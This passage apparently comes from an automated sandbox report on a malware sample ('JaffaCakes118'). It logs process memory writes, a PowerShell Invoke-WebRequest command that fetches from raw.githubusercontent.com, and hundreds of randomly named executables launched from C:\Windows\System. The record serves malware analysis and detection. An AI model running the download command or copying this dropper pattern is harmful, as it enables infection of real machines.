PID 3884 wrote to memory of 1928 N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe C:\Windows\System\WcvDFoo.exe
PID 3884 wrote to memory of 4584 N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe C:\Windows\System\eTyYfAF.exe
PID 3884 wrote to memory of 4584 N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe C:\Windows\System\eTyYfAF.exe
PID 3884 wrote to memory of 3612 N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe C:\Windows\System\wlNkaPl.exe
PID 3884 wrote to memory of 3612 N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe C:\Windows\System\wlNkaPl.exe
PID 3884 wrote to memory of 3472 N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe C:\Windows\System\liasDNp.exe
PID 3884 wrote to memory of 3472 N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe C:\Windows\System\liasDNp.exe
PID 3884 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe C:\Windows\System\mdsggNm.exe
PID 3884 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe C:\Windows\System\mdsggNm.exe
PID 3884 wrote to memory of 4068 N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe C:\Windows\System\AZzDyUj.exe
PID 3884 wrote to memory of 4068 N/A C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe C:\Windows\System\AZzDyUj.exe

Processes

C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\72a131b52c0c0408acdcd4d6e6ca5f95_JaffaCakes118.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "

C:\Windows\System\WEdWpfQ.exe

C:\Windows\System\WEdWpfQ.exe

C:\Windows\System\iJIiCJq.exe

C:\Windows\System\iJIiCJq.exe

C:\Windows\System\SlUzHUI.exe

C:\Windows\System\SlUzHUI.exe

C:\Windows\System\YhhOMKX.exe

C:\Windows\System\YhhOMKX.exe

C:\Windows\System\jBKgZVY.exe

C:\Windows\System\jBKgZVY.exe

C:\Windows\System\lKfXUDB.exe

C:\Windows\System\lKfXUDB.exe

C:\Windows\System\FIysWxA.exe

C:\Windows\System\FIysWxA.exe

C:\Windows\System\CPaDGNf.exe

C:\Windows\System\CPaDGNf.exe

C:\Windows\System\tjTcviI.exe

C:\Windows\System\tjTcviI.exe

C:\Windows\System\ffdmQaR.exe

C:\Windows\System\ffdmQaR.exe

C:\Windows\System\USvNhcN.exe

C:\Windows\System\USvNhcN.exe

C:\Windows\System\tTaUfid.exe

C:\Windows\System\tTaUfid.exe

C:\Windows\System\KANVVMG.exe

C:\Windows\System\KANVVMG.exe

C:\Windows\System\RUWLLQC.exe

C:\Windows\System\RUWLLQC.exe

C:\Windows\System\obKuKcS.exe

C:\Windows\System\obKuKcS.exe

C:\Windows\System\RORWCvZ.exe

C:\Windows\System\RORWCvZ.exe

C:\Windows\System\iAKgzZB.exe

C:\Windows\System\iAKgzZB.exe

C:\Windows\System\cpWyWrV.exe

C:\Windows\System\cpWyWrV.exe

C:\Windows\System\EDUyNjK.exe

C:\Windows\System\EDUyNjK.exe

C:\Windows\System\sZVhXYQ.exe

C:\Windows\System\sZVhXYQ.exe

C:\Windows\System\bQZKyym.exe

C:\Windows\System\bQZKyym.exe

C:\Windows\System\BIwZtbF.exe

C:\Windows\System\BIwZtbF.exe

C:\Windows\System\rPxbhow.exe

C:\Windows\System\rPxbhow.exe

C:\Windows\System\ZAuZFir.exe

C:\Windows\System\ZAuZFir.exe

C:\Windows\System\rwoOWnl.exe

C:\Windows\System\rwoOWnl.exe

C:\Windows\System\WcvDFoo.exe

C:\Windows\System\WcvDFoo.exe

C:\Windows\System\eTyYfAF.exe

C:\Windows\System\eTyYfAF.exe

C:\Windows\System\wlNkaPl.exe

C:\Windows\System\wlNkaPl.exe

C:\Windows\System\liasDNp.exe

C:\Windows\System\liasDNp.exe

C:\Windows\System\mdsggNm.exe

C:\Windows\System\mdsggNm.exe

C:\Windows\System\AZzDyUj.exe

C:\Windows\System\AZzDyUj.exe

C:\Windows\System\sycowMw.exe

C:\Windows\System\sycowMw.exe

C:\Windows\System\lpKWiXm.exe

C:\Windows\System\lpKWiXm.exe

C:\Windows\System\sXMRqAj.exe

C:\Windows\System\sXMRqAj.exe

C:\Windows\System\DDLHUMi.exe

C:\Windows\System\DDLHUMi.exe

C:\Windows\System\tivybSU.exe

C:\Windows\System\tivybSU.exe

C:\Windows\System\wCCvcax.exe

C:\Windows\System\wCCvcax.exe

C:\Windows\System\XIgaUXX.exe

C:\Windows\System\XIgaUXX.exe

C:\Windows\System\HRsrSoo.exe

C:\Windows\System\HRsrSoo.exe

C:\Windows\System\WbxEhAL.exe

C:\Windows\System\WbxEhAL.exe

C:\Windows\System\YWGQDFk.exe

C:\Windows\System\YWGQDFk.exe

C:\Windows\System\gBLNeQt.exe

C:\Windows\System\gBLNeQt.exe

C:\Windows\System\sAhSBok.exe

C:\Windows\System\sAhSBok.exe

C:\Windows\System\GHxPtGJ.exe

C:\Windows\System\GHxPtGJ.exe

C:\Windows\System\SPloanH.exe

C:\Windows\System\SPloanH.exe

C:\Windows\System\KjQqrzQ.exe

C:\Windows\System\KjQqrzQ.exe

C:\Windows\System\cMwbecy.exe

C:\Windows\System\cMwbecy.exe

C:\Windows\System\wUkWJKH.exe

C:\Windows\System\wUkWJKH.exe

C:\Windows\System\PonXbQd.exe

C:\Windows\System\PonXbQd.exe

C:\Windows\System\xjcZJkr.exe

C:\Windows\System\xjcZJkr.exe

C:\Windows\System\hifqDmq.exe

C:\Windows\System\hifqDmq.exe

C:\Windows\System\JDctVAJ.exe

C:\Windows\System\JDctVAJ.exe

C:\Windows\System\YIlMSVt.exe

C:\Windows\System\YIlMSVt.exe

C:\Windows\System\TeyvTGe.exe

C:\Windows\System\TeyvTGe.exe

C:\Windows\System\aZqJrSp.exe

C:\Windows\System\aZqJrSp.exe

C:\Windows\System\fDLerQY.exe

C:\Windows\System\fDLerQY.exe

C:\Windows\System\KtckRhY.exe

C:\Windows\System\KtckRhY.exe

C:\Windows\System\TjQMzjC.exe

C:\Windows\System\TjQMzjC.exe

C:\Windows\System\OHkUKgm.exe

C:\Windows\System\OHkUKgm.exe

C:\Windows\System\dDwcXkh.exe

C:\Windows\System\dDwcXkh.exe

C:\Windows\System\gxZPwzb.exe

C:\Windows\System\gxZPwzb.exe

C:\Windows\System\AUtKNIM.exe

C:\Windows\System\AUtKNIM.exe

C:\Windows\System\bmRXiTS.exe

C:\Windows\System\bmRXiTS.exe

C:\Windows\System\AWIMXew.exe

C:\Windows\System\AWIMXew.exe

C:\Windows\System\VaMxzfK.exe

C:\Windows\System\VaMxzfK.exe

C:\Windows\System\OByOFxP.exe

C:\Windows\System\OByOFxP.exe

C:\Windows\System\XMIkgxX.exe

C:\Windows\System\XMIkgxX.exe

C:\Windows\System\pgGlsZn.exe

C:\Windows\System\pgGlsZn.exe

C:\Windows\System\vdXFZgL.exe

C:\Windows\System\vdXFZgL.exe

C:\Windows\System\MWLsKKI.exe

C:\Windows\System\MWLsKKI.exe

C:\Windows\System\yKyPAZS.exe

C:\Windows\System\yKyPAZS.exe

C:\Windows\System\eZAZtHD.exe

C:\Windows\System\eZAZtHD.exe

C:\Windows\System\jeEZzxX.exe

C:\Windows\System\jeEZzxX.exe

C:\Windows\System\SvcNJlh.exe

C:\Windows\System\SvcNJlh.exe

C:\Windows\System\qRwsTYs.exe

C:\Windows\System\qRwsTYs.exe

C:\Windows\System\tufAAdv.exe

C:\Windows\System\tufAAdv.exe

C:\Windows\System\hvrIkkQ.exe

C:\Windows\System\hvrIkkQ.exe

C:\Windows\System\KMspWyJ.exe

C:\Windows\System\KMspWyJ.exe

C:\Windows\System\FoOdcuq.exe

C:\Windows\System\FoOdcuq.exe

C:\Windows\System\fquocBE.exe

C:\Windows\System\fquocBE.exe

C:\Windows\System\JMYzQlG.exe

C:\Windows\System\JMYzQlG.exe

C:\Windows\System\sRTgtKe.exe

C:\Windows\System\sRTgtKe.exe

C:\Windows\System\fBefVZb.exe

C:\Windows\System\fBefVZb.exe

C:\Windows\System\KkDmJNd.exe

C:\Windows\System\KkDmJNd.exe

C:\Windows\System\OYVZFaY.exe

C:\Windows\System\OYVZFaY.exe

C:\Windows\System\NOQqnqL.exe

C:\Windows\System\NOQqnqL.exe

C:\Windows\System\VwFHMJm.exe

C:\Windows\System\VwFHMJm.exe

C:\Windows\System\JDjJJzz.exe

C:\Windows\System\JDjJJzz.exe

C:\Windows\System\xyZUnUc.exe

C:\Windows\System\xyZUnUc.exe

C:\Windows\System\moyNUPh.exe

C:\Windows\System\moyNUPh.exe

C:\Windows\System\FDgGefx.exe

C:\Windows\System\FDgGefx.exe

C:\Windows\System\dzZFguz.exe

C:\Windows\System\dzZFguz.exe

C:\Windows\System\YqftOkK.exe

C:\Windows\System\YqftOkK.exe

C:\Windows\System\cICTYVV.exe

C:\Windows\System\cICTYVV.exe

C:\Windows\System\FTOycOn.exe

C:\Windows\System\FTOycOn.exe

C:\Windows\System\uVUMVIp.exe

C:\Windows\System\uVUMVIp.exe

C:\Windows\System\xFMrmiR.exe

C:\Windows\System\xFMrmiR.exe

C:\Windows\System\alPEbru.exe

C:\Windows\System\alPEbru.exe

C:\Windows\System\jZAqMAf.exe

C:\Windows\System\jZAqMAf.exe

C:\Windows\System\iLwbNnV.exe

C:\Windows\System\iLwbNnV.exe

C:\Windows\System\MLOhgyz.exe

C:\Windows\System\MLOhgyz.exe

C:\Windows\System\MRAlnBv.exe

C:\Windows\System\MRAlnBv.exe

C:\Windows\System\qGVGrER.exe

C:\Windows\System\qGVGrER.exe

C:\Windows\System\AZXNPxA.exe

C:\Windows\System\AZXNPxA.exe

C:\Windows\System\BwtZLOV.exe

C:\Windows\System\BwtZLOV.exe

C:\Windows\System\XBZsBJI.exe

C:\Windows\System\XBZsBJI.exe

C:\Windows\System\erNSPZe.exe

C:\Windows\System\erNSPZe.exe

C:\Windows\System\BlvXthF.exe

C:\Windows\System\BlvXthF.exe

C:\Windows\System\zxzhUnD.exe

C:\Windows\System\zxzhUnD.exe

C:\Windows\System\KOPYWmV.exe

C:\Windows\System\KOPYWmV.exe

C:\Windows\System\eCYMyde.exe

C:\Windows\System\eCYMyde.exe

C:\Windows\System\OQMpzSc.exe

C:\Windows\System\OQMpzSc.exe

C:\Windows\System\DOsAubU.exe

C:\Windows\System\DOsAubU.exe

C:\Windows\System\DtOyPjV.exe

C:\Windows\System\DtOyPjV.exe

C:\Windows\System\bakbBHc.exe

C:\Windows\System\bakbBHc.exe

C:\Windows\System\bbectQy.exe

C:\Windows\System\bbectQy.exe

C:\Windows\System\TgbYZjq.exe

C:\Windows\System\TgbYZjq.exe

C:\Windows\System\nihvzIp.exe

C:\Windows\System\nihvzIp.exe

C:\Windows\System\WBDxFQy.exe

C:\Windows\System\WBDxFQy.exe

C:\Windows\System\WdoKaAy.exe

C:\Windows\System\WdoKaAy.exe

C:\Windows\System\PeiuOKx.exe

C:\Windows\System\PeiuOKx.exe

C:\Windows\System\vsKzLAa.exe

C:\Windows\System\vsKzLAa.exe

C:\Windows\System\ksIryhV.exe

C:\Windows\System\ksIryhV.exe

C:\Windows\System\cMGekZx.exe

C:\Windows\System\cMGekZx.exe

C:\Windows\System\lHSHqKS.exe

C:\Windows\System\lHSHqKS.exe

C:\Windows\System\ZDsiBga.exe

C:\Windows\System\ZDsiBga.exe

C:\Windows\System\BCAsNsp.exe

C:\Windows\System\BCAsNsp.exe

C:\Windows\System\tKSRBEA.exe

C:\Windows\System\tKSRBEA.exe

C:\Windows\System\eIycEkR.exe

C:\Windows\System\eIycEkR.exe

C:\Windows\System\FRxEFED.exe

C:\Windows\System\FRxEFED.exe

C:\Windows\System\xxhGPxx.exe

C:\Windows\System\xxhGPxx.exe

C:\Windows\System\euiMclY.exe

C:\Windows\System\euiMclY.exe

C:\Windows\System\DXxlxyp.exe

C:\Windows\System\DXxlxyp.exe

C:\Windows\System\SyXdfuo.exe

C:\Windows\System\SyXdfuo.exe

C:\Windows\System\gzNWlGM.exe

C:\Windows\System\gzNWlGM.exe

C:\Windows\System\SRKReXS.exe

C:\Windows\System\SRKReXS.exe

C:\Windows\System\GoYuHmq.exe

C:\Windows\System\GoYuHmq.exe

C:\Windows\System\gTQSwXf.exe

C:\Windows\System\gTQSwXf.exe

C:\Windows\System\HVvtqfa.exe

C:\Windows\System\HVvtqfa.exe

C:\Windows\System\PoXZosN.exe

C:\Windows\System\PoXZosN.exe

C:\Windows\System\cDxJILQ.exe

C:\Windows\System\cDxJILQ.exe

C:\Windows\System\RbIXlhc.exe

C:\Windows\System\RbIXlhc.exe

C:\Windows\System\EUtwFNz.exe

C:\Windows\System\EUtwFNz.exe

C:\Windows\System\dPxJnCp.exe

C:\Windows\System\dPxJnCp.exe

C:\Windows\System\xrUWJaR.exe

C:\Windows\System\xrUWJaR.exe

C:\Windows\System\LKywtXR.exe

C:\Windows\System\LKywtXR.exe

C:\Windows\System\TYHGamC.exe

C:\Windows\System\TYHGamC.exe

C:\Windows\System\BSgHugX.exe

C:\Windows\System\BSgHugX.exe

C:\Windows\System\QZFhhmA.exe

C:\Windows\System\QZFhhmA.exe

C:\Windows\System\JwqcLTz.exe

C:\Windows\System\JwqcLTz.exe

C:\Windows\System\vYQjyYc.exe

C:\Windows\System\vYQjyYc.exe

C:\Windows\System\xTEAWmS.exe

C:\Windows\System\xTEAWmS.exe

C:\Windows\System\ZXEWonL.exe

C:\Windows\System\ZXEWonL.exe

C:\Windows\System\VauCsVY.exe

C:\Windows\System\VauCsVY.exe

C:\Windows\System\kdfHyyk.exe

C:\Windows\System\kdfHyyk.exe

C:\Windows\System\LwNDJzq.exe

C:\Windows\System\LwNDJzq.exe

C:\Windows\System\LGlgnnK.exe

C:\Windows\System\LGlgnnK.exe

C:\Windows\System\DZKaklA.exe

C:\Windows\System\DZKaklA.exe

C:\Windows\System\LxYlWqr.exe

C:\Windows\System\LxYlWqr.exe

C:\Windows\System\rNYzcIJ.exe

C:\Windows\System\rNYzcIJ.exe

C:\Windows\System\OEJotGQ.exe

C:\Windows\System\OEJotGQ.exe

C:\Windows\System\XBOVGST.exe

C:\Windows\System\XBOVGST.exe

C:\Windows\System\WMpUJsa.exe

C:\Windows\System\WMpUJsa.exe

C:\Windows\System\RyPIeut.exe

C:\Windows\System\RyPIeut.exe

C:\Windows\System\YFyVqqw.exe

C:\Windows\System\YFyVqqw.exe

C:\Windows\System\qWvpSUw.exe

C:\Windows\System\qWvpSUw.exe

C:\Windows\System\QHqFUiB.exe

C:\Windows\System\QHqFUiB.exe

C:\Windows\System\RnScexR.exe

C:\Windows\System\RnScexR.exe

C:\Windows\System\vKqmDTH.exe

C:\Windows\System\vKqmDTH.exe

C:\Windows\System\hOqCcNq.exe

C:\Windows\System\hOqCcNq.exe

C:\Windows\System\LMaNTJk.exe

C:\Windows\System\LMaNTJk.exe

C:\Windows\System\iXYAsyO.exe

C:\Windows\System\iXYAsyO.exe

C:\Windows\System\UvGVHWI.exe

C:\Windows\System\UvGVHWI.exe

C:\Windows\System\sFhecGv.exe

C:\Windows\System\sFhecGv.exe

C:\Windows\System\qIqhuHU.exe

C:\Windows\System\qIqhuHU.exe

C:\Windows\System\wOQfDpB.exe

C:\Windows\System\wOQfDpB.exe

C:\Windows\System\UDwxtjK.exe

C:\Windows\System\UDwxtjK.exe

C:\Windows\System\MJFyeUm.exe

C:\Windows\System\MJFyeUm.exe

C:\Windows\System\EAqRlgJ.exe

C:\Windows\System\EAqRlgJ.exe

C:\Windows\System\TiGLtNQ.exe

C:\Windows\System\TiGLtNQ.exe

C:\Windows\System\dCxOKIR.exe

C:\Windows\System\dCxOKIR.exe

C:\Windows\System\AEOSRXV.exe

C:\Windows\System\AEOSRXV.exe

C:\Windows\System\sFHdXHX.exe

C:\Windows\System\sFHdXHX.exe

C:\Windows\System\jfGQerC.exe

C:\Windows\System\jfGQerC.exe

C:\Windows\System\pXTcHFT.exe

C:\Windows\System\pXTcHFT.exe

C:\Windows\System\CDUQUvM.exe

C:\Windows\System\CDUQUvM.exe

C:\Windows\System\XeJFLhD.exe

C:\Windows\System\XeJFLhD.exe

C:\Windows\System\FdywpyK.exe

C:\Windows\System\FdywpyK.exe

C:\Windows\System\xKsdRzH.exe

C:\Windows\System\xKsdRzH.exe

C:\Windows\System\PUZhMlU.exe

C:\Windows\System\PUZhMlU.exe

C:\Windows\System\IBpxZWO.exe

C:\Windows\System\IBpxZWO.exe

C:\Windows\System\WPgtJgk.exe

C:\Windows\System\WPgtJgk.exe

C:\Windows\System\hNuHMSJ.exe

C:\Windows\System\hNuHMSJ.exe

C:\Windows\System\ofZkvGB.exe

C:\Windows\System\ofZkvGB.exe

C:\Windows\System\qaWfLcd.exe

C:\Windows\System\qaWfLcd.exe

C:\Windows\System\anxsfHl.exe

C:\Windows\System\anxsfHl.exe

C:\Windows\System\qZguMyB.exe

C:\Windows\System\qZguMyB.exe

C:\Windows\System\VglDjwl.exe

C:\Windows\System\VglDjwl.exe

C:\Windows\System\UnfCxdI.exe

C:\Windows\System\UnfCxdI.exe

C:\Windows\System\eCdTIbs.exe

C:\Windows\System\eCdTIbs.exe

C:\Windows\System\zCWzaRH.exe

C:\Windows\System\zCWzaRH.exe

C:\Windows\System\KBExJRh.exe

C:\Windows\System\KBExJRh.exe

C:\Windows\System\MWWwjxn.exe

C:\Windows\System\MWWwjxn.exe

C:\Windows\System\ixpZrhk.exe

C:\Windows\System\ixpZrhk.exe

C:\Windows\System\XwpHaKn.exe

C:\Windows\System\XwpHaKn.exe

C:\Windows\System\eBEpDCY.exe

C:\Windows\System\eBEpDCY.exe

C:\Windows\System\tCrfnic.exe

C:\Windows\System\tCrfnic.exe

C:\Windows\System\vZzUYfd.exe

C:\Windows\System\vZzUYfd.exe

C:\Windows\System\DKHFClw.exe

C:\Windows\System\DKHFClw.exe

C:\Windows\System\CctzQtX.exe

C:\Windows\System\CctzQtX.exe

C:\Windows\System\ZIyDBCo.exe

C:\Windows\System\ZIyDBCo.exe

C:\Windows\System\OyjpQDm.exe

C:\Windows\System\OyjpQDm.exe

C:\Windows\System\WjRwLsG.exe

C:\Windows\System\WjRwLsG.exe

C:\Windows\System\sQSyklb.exe

C:\Windows\System\sQSyklb.exe

C:\Windows\System\UDJjHLY.exe

C:\Windows\System\UDJjHLY.exe

C:\Windows\System\oQiBRZU.exe

C:\Windows\System\oQiBRZU.exe

C:\Windows\System\bbmcwqs.exe

C:\Windows\System\bbmcwqs.exe

C:\Windows\System\YtqwWmy.exe

C:\Windows\System\YtqwWmy.exe

C:\Windows\System\WPGSNDZ.exe

C:\Windows\System\WPGSNDZ.exe

C:\Windows\System\TPHYdOh.exe

C:\Windows\System\TPHYdOh.exe

C:\Windows\System\xbTKZQB.exe

C:\Windows\System\xbTKZQB.exe

C:\Windows\System\kmFObjR.exe

C:\Windows\System\kmFObjR.exe

C:\Windows\System\XyIMTmv.exe

C:\Windows\System\XyIMTmv.exe

C:\Windows\System\nDhLMGc.exe

C:\Windows\System\nDhLMGc.exe

C:\Windows\System\ymhJzGp.exe

C:\Windows\System\ymhJzGp.exe

C:\Windows\System\oVOEjwL.exe

C:\Windows\System\oVOEjwL.exe

C:\Windows\System\woCIUvU.exe

C:\Windows\System\woCIUvU.exe

C:\Windows\System\JIxSXiX.exe

C:\Windows\System\JIxSXiX.exe

C:\Windows\System\LkyTdMr.exe

C:\Windows\System\LkyTdMr.exe

C:\Windows\System\qacgwYt.exe

C:\Windows\System\qacgwYt.exe

C:\Windows\System\KfZEYNr.exe

C:\Windows\System\KfZEYNr.exe

C:\Windows\System\PGpGUhI.exe

C:\Windows\System\PGpGUhI.exe

C:\Windows\System\LzCrmGF.exe

C:\Windows\System\LzCrmGF.exe

C:\Windows\System\rQNqywL.exe

C:\Windows\System\rQNqywL.exe

C:\Windows\System\QCfBBpk.exe

C:\Windows\System\QCfBBpk.exe

C:\Windows\System\gjctYnX.exe

C:\Windows\System\gjctYnX.exe

C:\Windows\System\oDpjMQt.exe

C:\Windows\System\oDpjMQt.exe

C:\Windows\System\rLVZvXN.exe

C:\Windows\System\rLVZvXN.exe

C:\Windows\System\HQQOhWd.exe

C:\Windows\System\HQQOhWd.exe

C:\Windows\System\qhWPlLQ.exe

C:\Windows\System\qhWPlLQ.exe

C:\Windows\System\ffCTzgS.exe

C:\Windows\System\ffCTzgS.exe

C:\Windows\System\ZpNPzZa.exe

C:\Windows\System\ZpNPzZa.exe

C:\Windows\System\YahNzHp.exe

C:\Windows\System\YahNzHp.exe

C:\Windows\System\ZRcPYjz.exe

C:\Windows\System\ZRcPYjz.exe

C:\Windows\System\vIUdlUT.exe

C:\Windows\System\vIUdlUT.exe

C:\Windows\System\cmmCAkF.exe

C:\Windows\System\cmmCAkF.exe

C:\Windows\System\PPCqEIo.exe

C:\Windows\System\PPCqEIo.exe

C:\Windows\System\APJoYFE.exe

C:\Windows\System\APJoYFE.exe

C:\Windows\System\BnOibNK.exe

C:\Windows\System\BnOibNK.exe

C:\Windows\System\AyyILqN.exe

C:\Windows\System\AyyILqN.exe

C:\Windows\System\ERLVCMj.exe

C:\Windows\System\ERLVCMj.exe

C:\Windows\System\YQOlhpM.exe

C:\Windows\System\YQOlhpM.exe

C:\Windows\System\CGnuHgv.exe

C:\Windows\System\CGnuHgv.exe

C:\Windows\System\rBFonzG.exe

C:\Windows\System\rBFonzG.exe

C:\Windows\System\hTZqotX.exe

C:\Windows\System\hTZqotX.exe

C:\Windows\System\jtQeGcN.exe

C:\Windows\System\jtQeGcN.exe

C:\Windows\System\RBtGleO.exe

C:\Windows\System\RBtGleO.exe

C:\Windows\System\baKiSQj.exe

C:\Windows\System\baKiSQj.exe

C:\Windows\System\GRImVfN.exe

C:\Windows\System\GRImVfN.exe

C:\Windows\System\bTaXepP.exe

C:\Windows\System\bTaXepP.exe

C:\Windows\System\lBDNoqb.exe

C:\Windows\System\lBDNoqb.exe

C:\Windows\System\heVlcLL.exe

C:\Windows\System\heVlcLL.exe

C:\Windows\System\eeHNGEP.exe

C:\Windows\System\eeHNGEP.exe

C:\Windows\System\VohscWo.exe

C:\Windows\System\VohscWo.exe

C:\Windows\System\aWboyoL.exe

C:\Windows\System\aWboyoL.exe

C:\Windows\System\nohizqE.exe

C:\Windows\System\nohizqE.exe

C:\Windows\System\JoiGCCG.exe

C:\Windows\System\JoiGCCG.exe

C:\Windows\System\vZmaijU.exe

C:\Windows\System\vZmaijU.exe

C:\Windows\System\dKsQeXJ.exe

C:\Windows\System\dKsQeXJ.exe

C:\Windows\System\oqJshcl.exe

C:\Windows\System\oqJshcl.exe

C:\Windows\System\fIomgrP.exe

C:\Windows\System\fIomgrP.exe

C:\Windows\System\poPVPXb.exe

C:\Windows\System\poPVPXb.exe

C:\Windows\System\bbdVCIA.exe

C:\Windows\System\bbdVCIA.exe

C:\Windows\System\ZEYnfBU.exe

C:\Windows\System\ZEYnfBU.exe

C:\Windows\System\YxBmBdd.exe

C:\Windows\System\YxBmBdd.exe

C:\Windows\System\datuNIh.exe

C:\Windows\System\datuNIh.exe

C:\Windows\System\MOeNDiQ.exe

C:\Windows\System\MOeNDiQ.exe

C:\Windows\System\sTWfcET.exe

C:\Windows\System\sTWfcET.exe

C:\Windows\System\CxRYpII.exe

C:\Windows\System\CxRYpII.exe

C:\Windows\System\XKpIOPg.exe

C:\Windows\System\XKpIOPg.exe

C:\Windows\System\aqrGkqZ.exe

C:\Windows\System\aqrGkqZ.exe

C:\Windows\System\qyvxOXG.exe

C:\Windows\System\qyvxOXG.exe

C:\Windows\System\njefoAJ.exe

C:\Windows\System\njefoAJ.exe

C:\Windows\System\kWnKldl.exe

C:\Windows\System\kWnKldl.exe

C:\Windows\System\jmjxZUO.exe

C:\Windows\System\jmjxZUO.exe

C:\Windows\System\biuhCKt.exe

C:\Windows\System\biuhCKt.exe

C:\Windows\System\tJfDcQw.exe

C:\Windows\System\tJfDcQw.exe

C:\Windows\System\gpzVKXV.exe

C:\Windows\System\gpzVKXV.exe

C:\Windows\System\fkXLxsF.exe

C:\Windows\System\fkXLxsF.exe

C:\Windows\System\ZTvplhN.exe

C:\Windows\System\ZTvplhN.exe

C:\Windows\System\fGcKlVo.exe

C:\Windows\System\fGcKlVo.exe

C:\Windows\System\nuirIXd.exe

C:\Windows\System\nuirIXd.exe

C:\Windows\System\locQSqR.exe

C:\Windows\System\locQSqR.exe

C:\Windows\System\LqokmZT.exe

C:\Windows\System\LqokmZT.exe

C:\Windows\System\TCrEFdF.exe

C:\Windows\System\TCrEFdF.exe

C:\Windows\System\AHBhzUZ.exe

C:\Windows\System\AHBhzUZ.exe

C:\Windows\System\ETwQhCV.exe

C:\Windows\System\ETwQhCV.exe

C:\Windows\System\oYwAxOm.exe

C:\Windows\System\oYwAxOm.exe

C:\Windows\System\IsxjIYy.exe

C:\Windows\System\IsxjIYy.exe

C:\Windows\System\YDaBrlV.exe

C:\Windows\System\YDaBrlV.exe

C:\Windows\System\sQWXCtg.exe

C:\Windows\System\sQWXCtg.exe

C:\Windows\System\AkErExc.exe

C:\Windows\System\AkErExc.exe

C:\Windows\System\aQrvgKY.exe

C:\Windows\System\aQrvgKY.exe

C:\Windows\System\HVTBRVO.exe

C:\Windows\System\HVTBRVO.exe

C:\Windows\System\buXwmCu.exe

C:\Windows\System\buXwmCu.exe

C:\Windows\System\GfMrhFw.exe

C:\Windows\System\GfMrhFw.exe

C:\Windows\System\wiRnemz.exe

C:\Windows\System\wiRnemz.exe

C:\Windows\System\taKWaHi.exe

C:\Windows\System\taKWaHi.exe

C:\Windows\System\VUEIxvo.exe

C:\Windows\System\VUEIxvo.exe

C:\Windows\System\kbRGKdi.exe

C:\Windows\System\kbRGKdi.exe

C:\Windows\System\YtDyNpO.exe

C:\Windows\System\YtDyNpO.exe

C:\Windows\System\BAAevCO.exe

C:\Windows\System\BAAevCO.exe

C:\Windows\System\DpQAPyd.exe

C:\Windows\System\DpQAPyd.exe

C:\Windows\System\HjuWzgN.exe

C:\Windows\System\HjuWzgN.exe

C:\Windows\System\aZdrXXH.exe

C:\Windows\System\aZdrXXH.exe

C:\Windows\System\wHnLtlS.exe

C:\Windows\System\wHnLtlS.exe

C:\Windows\System\NXyMdUu.exe

C:\Windows\System\NXyMdUu.exe

C:\Windows\System\AkwEmfu.exe

C:\Windows\System\AkwEmfu.exe

C:\Windows\System\XVvLfeY.exe

C:\Windows\System\XVvLfeY.exe

C:\Windows\System\DcEWlfy.exe

C:\Windows\System\DcEWlfy.exe

C:\Windows\System\zjTGpiH.exe

C:\Windows\System\zjTGpiH.exe

C:\Windows\System\qOHarMG.exe

C:\Windows\System\qOHarMG.exe

C:\Windows\System\etHfNAm.exe

C:\Windows\System\etHfNAm.exe

C:\Windows\System\meaXdxF.exe

C:\Windows\System\meaXdxF.exe

C:\Windows\System\MeGzaCw.exe

C:\Windows\System\MeGzaCw.exe

C:\Windows\System\IWAnnPp.exe

C:\Windows\System\IWAnnPp.exe

C:\Windows\System\BRipGRk.exe

C:\Windows\System\BRipGRk.exe

C:\Windows\System\IXZiGBX.exe

C:\Windows\System\IXZiGBX.exe

C:\Windows\System\CezRkUt.exe

C:\Windows\System\CezRkUt.exe

C:\Windows\System\xoClbVL.exe

C:\Windows\System\xoClbVL.exe

C:\Windows\System\hvupWqs.exe

C:\Windows\System\hvupWqs.exe

C:\Windows\System\aJyvFOY.exe

C:\Windows\System\aJyvFOY.exe

C:\Windows\System\vJNvjwh.exe

C:\Windows\System\vJNvjwh.exe

C:\Windows\System\HPJzXWq.exe

C:\Windows\System\HPJzXWq.exe

C:\Windows\System\PKLVFGd.exe

C:\Windows\System\PKLVFGd.exe

C:\Windows\System\qxfknBU.exe

C:\Windows\System\qxfknBU.exe

C:\Windows\System\IElgmNo.exe

C:\Windows\System\IElgmNo.exe

C:\Windows\System\XUBWBYQ.exe

C:\Windows\System\XUBWBYQ.exe

C:\Windows\System\iMQwzjF.exe

C:\Windows\System\iMQwzjF.exe

C:\Windows\System\NlewJWk.exe

C:\Windows\System\NlewJWk.exe

C:\Windows\System\WOcUcbD.exe

C:\Windows\System\WOcUcbD.exe

C:\Windows\System\BGoVQoE.exe

C:\Windows\System\BGoVQoE.exe

C:\Windows\System\uTMIRyU.exe

C:\Windows\System\uTMIRyU.exe

C:\Windows\System\mNZZYce.exe

C:\Windows\System\mNZZYce.exe

C:\Windows\System\WYPQQgy.exe

C:\Windows\System\WYPQQgy.exe

C:\Windows\System\BbBjPeh.exe

C:\Windows\System\BbBjPeh.exe

C:\Windows\System\RnDqSkg.exe

C:\Windows\System\RnDqSkg.exe

C:\Windows\System\XpSkpVG.exe

C:\Windows\System\XpSkpVG.exe

C:\Windows\System\BJeHLYG.exe

C:\Windows\System\BJeHLYG.exe

